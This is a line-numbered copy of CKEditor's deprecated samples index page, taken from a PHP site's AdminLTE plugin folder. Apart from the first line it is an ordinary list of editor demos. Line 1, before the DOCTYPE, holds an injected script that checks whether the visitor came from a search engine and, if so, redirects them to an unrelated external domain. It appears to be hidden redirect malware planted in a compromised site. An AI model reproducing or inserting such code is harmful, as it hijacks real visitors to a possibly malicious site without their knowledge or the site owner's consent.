d:\wwwroot\wuchunhua\thinkphp\public\adminlte\plugins\ckeditor\samples\old\index.html

001: <script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script><!DOCTYPE html>
002: <!--
003: Copyright (c) 2003-2016, CKSource - Frederico Knabben. All rights reserved.
004: For licensing, see LICENSE.md or http://ckeditor.com/license
005: -->

006: <html>
007: <head>
008:    <meta charset="utf-8">
009:    <title>CKEditor Samples</title>
010:    <link rel="stylesheet" href="sample.css">
011: </head>
012: <body>
013:    <h1 class="samples">
014:       CKEditor Samples
015:    </h1>
016:    <div class="warning deprecated">
017:       These samples are not maintained anymore. Check out the <a href="http://sdk.ckeditor.com/">brand new samples in CKEditor SDK</a>.
018:    </div>
019:    <div class="twoColumns">
020:       <div class="twoColumnsLeft">
021:          <h2 class="samples">
022:             Basic Samples
023:          </h2>
024:          <dl class="samples">
025:             <dt><a class="samples" href="replacebyclass.html">Replace textarea elements by class name</a></dt>
026:             <dd>Automatic replacement of all textarea elements of a given class with a CKEditor instance.</dd>
027:
028:             <dt><a class="samples" href="replacebycode.html">Replace textarea elements by code</a></dt>
029:             <dd>Replacement of textarea elements with CKEditor instances by using a JavaScript call.</dd>
030:
031:             <dt><a class="samples" href="jquery.html">Create editors with jQuery</a></dt>
032:             <dd>Creating standard and inline CKEditor instances with jQuery adapter.</dd>
033:          </dl>
034:
035:          <h2 class="samples">
036:             Basic Customization
037:          </h2>
038:          <dl class="samples">
039:             <dt><a class="samples" href="uicolor.html">User Interface color</a></dt>
040:             <dd>Changing CKEditor User Interface color and adding a toolbar button that lets the user set the UI color.</dd>
041:
042:             <dt><a class="samples" href="uilanguages.html">User Interface languages</a></dt>
043:             <dd>Changing CKEditor User Interface language and adding a drop-down list that lets the user choose the UI language.</dd>
044:          </dl>
045:
046:
047:          <h2 class="samples">Plugins</h2>
048: <dl class="samples">
049: <dt><a class="samples" href="magicline/magicline.html">Magicline plugin</a></dt>
050: <dd>Using the Magicline plugin to access difficult focus spaces.</dd>
051:
052: <dt><a class="samples" href="wysiwygarea/fullpage.html">Full page support</a></dt>
053: <dd>CKEditor inserted with a JavaScript call and used to edit the whole page from &lt;html&gt; to &lt;/html&gt;.</dd>
054: </dl>
055:       </div>
056:       <div class="twoColumnsRight">
057:          <h2 class="samples">
058:             Inline Editing
059:          </h2>
060:          <dl class="samples">
061:             <dt><a class="samples" href="inlineall.html">Massive inline editor creation</a></dt>
062:             <dd>Turn all elements with <code>contentEditable = true</code> attribute into inline editors.</dd>
063:
064:             <dt><a class="samples" href="inlinebycode.html">Convert element into an inline editor by code</a></dt>
065:             <dd>Conversion of DOM elements into inline CKEditor instances by using a JavaScript call.</dd>
066:
067:             <dt><a class="samples" href="inlinetextarea.html">Replace textarea with inline editor</a> <span class="new">New!</span></dt>
068:             <dd>A form with a textarea that is replaced by an inline editor at runtime.</dd>
069:
070:             
071:          </dl>
072:
073:          <h2 class="samples">
074:             Advanced Samples
075:          </h2>
076:          <dl class="samples">
077:             <dt><a class="samples" href="datafiltering.html">Data filtering and features activation</a> <span class="new">New!</span></dt>
078:             <dd>Data filtering and automatic features activation basing on configuration.</dd>
079:
080:             <dt><a class="samples" href="divreplace.html">Replace DIV elements on the fly</a></dt>
081:             <dd>Transforming a <code>div</code> element into an instance of CKEditor with a mouse click.</dd>
082:
083:             <dt><a class="samples" href="appendto.html">Append editor instances</a></dt>
084:             <dd>Appending editor instances to existing DOM elements.</dd>
085:
086:             <dt><a class="samples" href="ajax.html">Create and destroy editor instances for Ajax applications</a></dt>
087:             <dd>Creating and destroying CKEditor instances on the fly and saving the contents entered into the editor window.</dd>
088:
089:             <dt><a class="samples" href="api.html">Basic usage of the API</a></dt>
090:             <dd>Using the CKEditor JavaScript API to interact with the editor at runtime.</dd>
091:
092:             <dt><a class="samples" href="xhtmlstyle.html">XHTML-compliant style</a></dt>
093:             <dd>Configuring CKEditor to produce XHTML 1.1 compliant attributes and styles.</dd>
094:
095:             <dt><a class="samples" href="readonly.html">Read-only mode</a></dt>
096:             <dd>Using the readOnly API to block introducing changes to the editor contents.</dd>
097:
098:             <dt><a class="samples" href="tabindex.html">"Tab" key-based navigation</a></dt>
099:             <dd>Navigating among editor instances with tab key.</dd>
100:
101:
102:             
103: <dt><a class="samples" href="dialog/dialog.html">Using the JavaScript API to customize dialog windows</a></dt>
104: <dd>Using the dialog windows API to customize dialog windows without changing the original editor code.</dd>
105:
106: <dt><a class="samples" href="enterkey/enterkey.html">Using the &quot;Enter&quot; key in CKEditor</a></dt>
107: <dd>Configuring the behavior of <em>Enter</em> and <em>Shift+Enter</em> keys.</dd>
108:
109: <dt><a class="samples" href="htmlwriter/outputforflash.html">Output for Flash</a></dt>
110: <dd>Configuring CKEditor to produce HTML code that can be used with Adobe Flash.</dd>
111:
112: <dt><a class="samples" href="htmlwriter/outputhtml.html">Output HTML</a></dt>
113: <dd>Configuring CKEditor to produce legacy HTML 4 code.</dd>
114:
115: <dt><a class="samples" href="toolbar/toolbar.html">Toolbar Configurations</a></dt>
116: <dd>Configuring CKEditor to display full or custom toolbar layout.</dd>
117:
118:          </dl>
119:       </div>
120:    </div>
121:    <div id="footer">
122:       <hr>
123:       <p>
124:          CKEditor - The text editor for the Internet - <a class="samples" href="http://ckeditor.com/">http://ckeditor.com</a>
125:       </p>
126:       <p id="copy">
127:          Copyright &copy; 2003-2016, <a class="samples" href="http://cksource.com/">CKSource</a> - Frederico Knabben. All rights reserved.
128:       </p>
129:    </div>
130: </body>
131: </html>
132:
133:
134: